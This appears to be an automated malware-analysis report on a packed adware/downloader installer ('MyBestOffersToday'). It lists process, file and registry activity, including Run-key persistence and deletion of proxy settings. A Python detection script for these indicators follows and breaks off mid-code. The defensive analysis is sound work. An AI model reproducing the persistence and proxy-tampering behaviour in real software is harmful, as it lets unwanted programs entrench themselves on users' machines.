HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.Win32.Swrort.3.FD (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 97c94f7678fa89eb87858f8e5a7c13ab
SHA1: 14558f60160dbed797a212c4db37ad8a5c6859ef
SHA256: e0edf44c18eb85831920443c696c4e75c9d5c4c92d056552e8c3e6f0413c7ca0
SSDeep: 6144:6/QiQPsDJZVpdtyhvOJGYgBpl7hCnaTxUKsE9ceJRvcj68xhxXqo7V5/q/hAUfB:CQiGs1ZVpXyVOJilKhC2Iqjzva6WXd5
Size: 385387 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17 (the constant TimeDateStamp 0x2A425E19 = 1992-06-19 22:22:17 UTC that the Borland Delphi linker writes into every PE it builds, rendered here in a UTC+3 time zone; it is a compiler artefact, not the build date, and is consistent with the BorlandDelphi30 PEiD match and the Inno Setup version info below)
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
taskkill.exe:320
taskkill.exe:1336
taskkill.exe:2044
97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680
tasklist.exe:1928
tasklist.exe:364
upmbot_ca_014010265.exe:1092
%original file name%.exe:668
mbot_ca_014010265.exe:1736
encrypt.exe:216
encrypt.exe:1260
encrypt.exe:196
encrypt.exe:264
setup.tmp:1896
setup.exe:1948
The SpyTool injects its code into the following process(es):
No code injection was observed.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process 97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O9YZOXQZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KH2NKL2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5Q3CH2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ODABS1EF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (657385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (23 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (0 bytes)
The process upmbot_ca_014010265.exe:1092 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
The process %original file name%.exe:668 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (3780 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp (0 bytes)
The process mbot_ca_014010265.exe:1736 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\mbot_ca_014010265\1.10\cnf.cyl (269 bytes)
The process encrypt.exe:216 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (16609 bytes)
The process encrypt.exe:1260 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (20237 bytes)
The process encrypt.exe:196 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (16649 bytes)
The process encrypt.exe:264 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (3300 bytes)
The process setup.tmp:1896 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (8657 bytes)
%Program Files%\mbot_ca_014010265\is-OP7DE.tmp (28787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HE4TJ.tmp (4185 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MYBESTOFFERSTODAY\MyBestOffersToday.lnk (837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HT75P.tmp (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-LGPBB.tmp (7433 bytes)
%Program Files%\mbot_ca_014010265\unins000.dat (35465 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-61C0M.tmp (8657 bytes)
%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-6DL8S.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (7971 bytes)
%Program Files%\mbot_ca_014010265\mybestofferstoday_widget.exe (23404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (1564 bytes)
%Program Files%\mbot_ca_014010265\predm.exe (4185 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\MYBESTOFFERSTODAY_WIDGET.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\UPMBOT_CA_014010265.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\MBOT_CA_014010265.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp (0 bytes)
The process setup.exe:1948 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (6319 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp (0 bytes)
Registry activity
Note: the "Seed" writes under HKLM\SOFTWARE\Microsoft\Cryptography\RNG are made by CryptoAPI whenever a process draws random numbers, and the Shell Folders, Internet Settings\Cache\Paths, Connections\SavedLegacySettings, MigrateProxy and ZoneMap values listed below are what the shell and WinINet write on first use in a fresh Windows XP profile. They are side-effects of running on the analysis machine, not indicators for this sample. The values that do characterise it are the Run, Uninstall\mbot_ca_014010265_is1, Tutorials, TutoTag, Tinstalls and MYBESTOFFERSTODAY keys.
The process taskkill.exe:320 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 43 41 0D 5F 0A A9 63 31 40 17 91 F8 D5 2B FF"
The process taskkill.exe:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 2E 08 D3 C4 75 BB 80 AC 80 FE 84 D1 2B A2 E5"
The process taskkill.exe:2044 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 50 3F 17 6A E9 42 E2 F1 ED BE BF FB 5F DA 64"
The process 97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 35 00 E8 F2 D2 BC 60 D3 4B 65 FD 7D A9 CF 61"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool sets the following IE security-zone values (the Windows defaults for automatic intranet detection):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (UNC paths are mapped to the Intranet zone)
"ProxyBypass" = "1" (sites that bypass the proxy are mapped to the Intranet zone)
"IntranetName" = "1" (local host names without dots are mapped to the Intranet zone)
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tasklist.exe:1928 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 9A B0 64 40 76 1C EF EE 26 7B 4E 5B C9 F1 A0"
The process tasklist.exe:364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 79 78 1E 12 96 79 C4 05 FA 38 05 28 42 80 1B"
The process upmbot_ca_014010265.exe:1092 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "mbot_ca_014010265"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "93DCBECB-77B0-45FA-8C3B-666267523CCF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 0C 6E 09 57 E6 62 0A 4F 59 B7 EC 44 A0 A4 DE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool sets the following IE security-zone values (the Windows defaults for automatic intranet detection):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (UNC paths are mapped to the Intranet zone)
"ProxyBypass" = "1" (sites that bypass the proxy are mapped to the Intranet zone)
"IntranetName" = "1" (local host names without dots are mapped to the Intranet zone)
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run automatically each time Windows is booted, the SpyTool adds the following value to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upmbot_ca_014010265.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:668 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 27 91 7B A2 73 84 5A 7A 77 E9 3D C8 C3 3E 5A"
The process mbot_ca_014010265.exe:1736 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 10 C3 9C CF C5 D4 3D 79 BC 3D A7 30 4E 5C AF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process encrypt.exe:216 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 5E 6A F4 1E D7 95 19 E7 62 F7 A5 CF E5 CE 05"
The process encrypt.exe:1260 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 0E 08 D5 1E 2D A4 3A FA 0F 66 A2 D2 40 C8 65"
The process encrypt.exe:196 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D0 CE 93 50 EA 39 BC 26 B3 FF 21 0A 0D 80 FA"
The process encrypt.exe:264 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 9B E5 29 0A F9 E4 BA C4 C7 82 46 75 E2 F0 59"
The process setup.tmp:1896 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "16.03.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"NoModify" = "1"
"Inno Setup: Language" = "ca"
"Inno Setup: User" = "%CurrentUserName%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"InstallDate" = "20160312"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"DisplayName" = "MyBestOffersToday 026.014010265"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Inno Setup: Setup Version" = "5.5.4 (a)"
"Inno Setup: Icon Group" = "MYBESTOFFERSTODAY"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MYBESTOFFERSTODAY\mbot_ca_014010265]
"PathInstall" = "%Program Files%\mbot_ca_014010265"
[HKCU\Software\TutoTag]
"OnceInstalled" = "ca"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"UninstallString" = "%Program Files%\mbot_ca_014010265\unins000.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Tinstalls]
"20160312" = "1"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 7B 06 24 23 BA 65 46 D7 9E DF 9C DA 1E 04 20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Inno Setup: App Path" = "%Program Files%\mbot_ca_014010265"
"InstallLocation" = "%Program Files%\mbot_ca_014010265\"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Publisher" = "MYBESTOFFERSTODAY"
"QuietUninstallString" = "%Program Files%\mbot_ca_014010265\unins000.exe /SILENT"
[HKCU\Software\TutoTag]
"OnceInstalled2" = "ca"
To run automatically each time Windows is booted, the SpyTool adds the following value to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"mbot_ca_014010265" = "%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe"
The process setup.exe:1948 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 2A 46 F5 D3 11 B4 55 2C 0B 8B B3 A5 D1 F5 7E"
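The behaviour recorded above (Inno Setup unpacking through %Temp%\is-XXXXX.tmp\ directories, tasklist.exe and taskkill.exe running during installation, and Run-key persistence from a user-writable profile directory) can be turned into host-side detections. The following is an added example, not part of the Lavasoft report and not code from the analysed installer; the pipe-separated event format, the parent/child links in the sample telemetry and the explorer.exe root are assumptions made for the demonstration, since the report lists processes but not a process tree.

```python
r"""Two detections over constructed host telemetry (added example, not
Lavasoft's code), derived from the behaviour in the report above.

Rule 1 - an Inno Setup unpack directory (%TEMP%\is-XXXXX.tmp\) appears in
         the ancestry of tasklist.exe / taskkill.exe, i.e. an installer is
         enumerating or killing processes (cf. the dropped CheckProc.cmd, ex.bat).
Rule 2 - a Run-key value points into a user-writable profile directory
         (Local Settings\Application Data, Local Settings\Temp, AppData\Local|Roaming).

Event format "KIND|pid|..." is an assumption made for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

INNO_TMP_DIR = re.compile(r"\\Temp\\is-[A-Z0-9]{5}\.tmp\\", re.IGNORECASE)
RECON_TOOLS = {"tasklist.exe", "taskkill.exe"}
USER_WRITABLE = re.compile(
    r"\\(Local Settings\\Application Data|Local Settings\\Temp|Application Data"
    r"|AppData\\(Local|Roaming))\\",
    re.IGNORECASE,
)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def _inno_ancestor(pid: int, procs: Dict[int, Tuple[int, str]], max_depth: int = 32) -> Optional[str]:
    """Walk pid -> parent -> ... and return the first image living in an is-XXXXX.tmp dir."""
    for _ in range(max_depth):
        if pid not in procs:
            return None
        ppid, image = procs[pid]
        if INNO_TMP_DIR.search(image):
            return image
        pid = ppid
    return None


def analyze(events: List[str]) -> List[Finding]:
    procs: Dict[int, Tuple[int, str]] = {}
    findings: List[Finding] = []
    for line in events:
        kind, pid_s, *fields = line.strip().split("|")
        pid = int(pid_s)
        if kind == "PROC":                      # PROC|pid|ppid|image_path
            ppid, image = int(fields[0]), fields[1]
            procs[pid] = (ppid, image)
            if image.rsplit("\\", 1)[-1].lower() in RECON_TOOLS:
                origin = _inno_ancestor(pid, procs)
                if origin:
                    findings.append(Finding("inno_tmp_spawns_recon", pid, f"{origin} -> {image}"))
        elif kind == "REG":                     # REG|pid|key|value_name|data
            key, name, data = fields
            if RUN_KEY.search(key) and USER_WRITABLE.search(data):
                findings.append(Finding("run_key_user_writable", pid, f"{name} = {data}"))
    return findings


# Constructed telemetry modelled on the process and registry activity above;
# the parent/child links and the explorer.exe root are assumptions.
T = r"C:\Documents and Settings\user\Local Settings\Temp"
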